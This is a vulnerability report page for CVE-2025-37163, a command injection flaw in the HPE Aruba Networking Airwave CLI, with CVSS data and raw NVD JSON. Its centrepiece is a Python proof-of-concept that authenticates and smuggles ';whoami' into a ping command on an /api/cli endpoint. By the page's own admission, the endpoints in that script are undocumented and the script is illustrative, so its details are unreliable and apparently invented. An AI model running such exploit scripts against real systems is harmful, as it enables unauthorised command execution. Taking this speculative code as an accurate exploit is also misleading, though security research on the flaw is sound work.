Security Vulnerability Report
CVE-2025-37163 CVSS 7.2 HIGH

CVE-2025-37163

Published: 2025-11-18 19:15:48
Last Modified: 2025-12-03 13:34:56

Description

A command injection vulnerability has been identified in the command line interface of the HPE Aruba Networking Airwave Platform. An authenticated attacker could exploit this vulnerability to execute arbitrary operating system commands with elevated privileges on the underlying operating system.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:* - VULNERABLE
HPE Aruba Networking Airwave Platform, versions prior to 8.3.0.5 (per the NVD configuration data: versionEndExcluding 8.3.0.5)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-37163 PoC - HPE Aruba Airwave Command Injection
# Usage: python poc.py <target_url> <username> <password>
#
# Note: the /api/login and /api/cli endpoints and the request parameters used
# below are not documented in the NVD record reproduced on this page; treat
# this script as illustrative rather than verified against the product.


def exploit_airwave_cve(target_url, username, password):
    """
    Exploit for CVE-2025-37163: Command Injection in HPE Aruba Airwave Platform CLI
    This PoC demonstrates how an authenticated attacker can execute arbitrary OS commands.
    """
    session = requests.Session()

    # Step 1: Authentication
    login_url = f"{target_url}/api/login"
    login_data = {
        'username': username,
        'password': password
    }

    try:
        response = session.post(login_url, data=login_data, timeout=10)
        if response.status_code != 200:
            print("[-] Authentication failed")
            return False
        print("[+] Successfully authenticated")

        # Step 2: Command Injection via CLI
        # Inject malicious command through vulnerable parameter
        cli_url = f"{target_url}/api/cli"
        # Payload: Execute arbitrary command (e.g., whoami)
        malicious_command = ";whoami"
        payload = {
            'command': f'ping {malicious_command}',
            'execute': 'true'
        }
        response = session.post(cli_url, data=payload, timeout=10)
        if response.status_code == 200 and 'root' in response.text:
            print("[+] Command injection successful - Running as root!")
            print(f"[+] Response: {response.text}")
            return True
        else:
            print("[-] Command injection may have failed")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        sys.exit(1)
    exploit_airwave_cve(sys.argv[1], sys.argv[2], sys.argv[3])
```

References

HPE Security Bulletin (Vendor Advisory): https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04971en_us&docLocale=en_US
Raw JSON Data

```json
{"cve": {"id": "CVE-2025-37163", "sourceIdentifier": "[email protected]", "published": "2025-11-18T19:15:48.290", "lastModified": "2025-12-03T13:34:55.903", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability has been identified in the command line interface of the HPE Aruba Networking Airwave Platform. An authenticated attacker could exploit this vulnerability to execute arbitrary operating system commands with elevated privileges on the underlying operating system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.3.0.5", "matchCriteriaId": "0E151549-B1AC-4E19-9625-0F553BBA7A14"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04971en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```